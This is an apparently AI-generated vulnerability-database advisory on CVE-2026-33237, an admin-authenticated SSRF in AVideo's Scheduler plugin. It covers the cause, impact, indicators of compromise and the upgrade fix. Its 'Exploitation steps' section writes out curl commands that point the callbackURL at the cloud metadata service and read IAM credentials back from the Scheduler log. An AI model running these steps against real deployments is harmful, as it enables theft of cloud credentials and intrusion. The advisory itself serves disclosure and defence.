CVE-2026-33237: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-33237 is a Server-Side Request Forgery (SSRF) vulnerability in the Scheduler plugin of AVideo (wwbn/avideo), a self-hosted video platform. The flaw exists in plugin/Scheduler/Scheduler.php where the run() function processes an admin-configurable callbackURL without applying the isSSRFSafeURL() validation check, allowing requests to internal network addresses and cloud metadata endpoints. All AVideo versions up to and including 25.0 are affected; version 26.0 contains the fix. The vulnerability was disclosed on March 18, 2026, published to the GitHub Advisory Database on March 19, 2026, and assigned a CVSS v3.1 base score of 5.5 (Moderate) (GitHub Advisory, AVideo Advisory).

Technical details

The root cause is CWE-918 (Server-Side Request Forgery): the Scheduler plugin's run() function at plugin/Scheduler/Scheduler.php:157-166 validates the callbackURL only with isValidURL(), which uses PHP's filter_var($url, FILTER_VALIDATE_URL) to check URL syntax but does not block private or link-local network targets. The critical missing control is isSSRFSafeURL() — a function already present in objects/functions.php that explicitly blocks loopback (127.x.x.x, ::1), RFC-1918 private ranges (10.x.x.x, 172.16-31.x.x, 192.168.x.x), link-local addresses (169.254.x.x including the AWS/GCP/Azure metadata endpoint at 169.254.169.254), and IPv6 private ranges. This check was added to other AVideo endpoints in prior SSRF fixes (GHSA-9x67-f2v7-63rw for the LiveLinks proxy and GHSA-h39h-7cvg-q7j6 for the aVideoEncoder download flow), but the Scheduler plugin was overlooked in both fix waves, constituting an incomplete patch. Exploitation requires an authenticated admin session to configure a scheduled task with a malicious callbackURL and trigger it via the Scheduler's "Run now" interface (GitHub Advisory, AVideo Advisory).

Impact

A successful exploit allows an authenticated administrator to cause the AVideo server to issue arbitrary HTTP requests to internal network resources. The most severe impact in cloud-hosted deployments (AWS, GCP, Azure) is theft of IAM instance role credentials from the metadata service at 169.254.169.254, which can enable privilege escalation and lateral movement within the cloud environment. Additionally, the attacker can probe internal APIs, microservices, or databases with HTTP interfaces that are not exposed to the internet, with the server's response stored in the Scheduler execution log and retrievable by the attacker. Availability is not directly impacted, but confidentiality is highly affected and integrity is marginally affected through potential misuse of stolen credentials (GitHub Advisory).

Exploitability

A concrete, step-by-step proof-of-concept (PoC) using curl commands is publicly available in the GitHub security advisory, demonstrating how to create a malicious scheduled task, trigger execution, and retrieve cloud IAM credentials from the Scheduler log (AVideo Advisory). There is no evidence of in-the-wild exploitation at this time, and no threat actor attribution has been reported. The EPSS score is approximately 0.026% (6th percentile), indicating a low current probability of exploitation in the wild. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.

Exploitation steps

  1. Authenticate as admin: Obtain a valid admin session cookie (admin_session) for the target AVideo instance running version ≤ 25.0.
  2. Create a malicious scheduled task: Send a POST request to the Scheduler add endpoint with a callbackURL pointing to the AWS cloud metadata service:
curl -b "admin_session=<session>" -X POST \
  https://target.avideo.site/plugin/Scheduler/View/Scheduler_commands/add.json.php \
  -d "callbackURL=http://169.254.169.254/latest/meta-data/iam/security-credentials/&status=a&type=&date_to_execute=2026-03-18+12:00:00"
  1. Trigger immediate execution: Call the Scheduler run endpoint to execute the task immediately:
curl -b "admin_session=<session>" \
  https://target.avideo.site/plugin/Scheduler/run.php
  1. Retrieve exfiltrated credentials: Read the Scheduler execution log, which contains the metadata service response including IAM role credentials:
curl -b "admin_session=<session>" \
  https://target.avideo.site/plugin/Scheduler/View/Scheduler_commands/get.json.php
  1. Leverage stolen credentials: Use the retrieved AWS IAM role credentials (AccessKeyId, SecretAccessKey, Token) to authenticate to AWS APIs and escalate privileges or access other cloud resources (AVideo Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from the AVideo server to 169.254.169.254 (cloud metadata service) or RFC-1918 private IP ranges; unexpected connections to internal microservices or databases originating from the web application process.
  • Logs: AVideo/web server access logs showing POST requests to /plugin/Scheduler/View/Scheduler_commands/add.json.php with callbackURL parameters containing 169.254.x.x, 10.x.x.x, 172.16-31.x.x, 192.168.x.x, or 127.x.x.x; GET requests to /plugin/Scheduler/run.php followed by /plugin/Scheduler/View/Scheduler_commands/get.json.php in close succession.
  • Application Data: Scheduler execution log entries (retrievable via get.json.php) containing cloud metadata API responses, IAM credential JSON blobs, or internal service responses.
  • File System: PHP error log entries with Scheduler::run SSRF protection blocked callbackURL: messages (present only after patching; absence of these on unpatched systems may indicate exploitation attempts went undetected) (AVideo Advisory).

Mitigation and workarounds

Upgrade AVideo to version 26.0 or later, which adds isSSRFSafeURL() validation to the Scheduler's callbackURL before url_get_contents() is called (commit df926e5) (Patch Commit). As a workaround for deployments that cannot immediately upgrade, restrict administrative access to the Scheduler plugin to trusted users only, and apply network-level egress filtering to block outbound requests from the AVideo server to 169.254.169.254 and RFC-1918 ranges. In cloud environments, consider using IMDSv2 (which requires session-oriented requests) on AWS to reduce metadata service exposure, or apply IAM policies that limit the blast radius of any stolen instance role credentials (GitHub Advisory).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management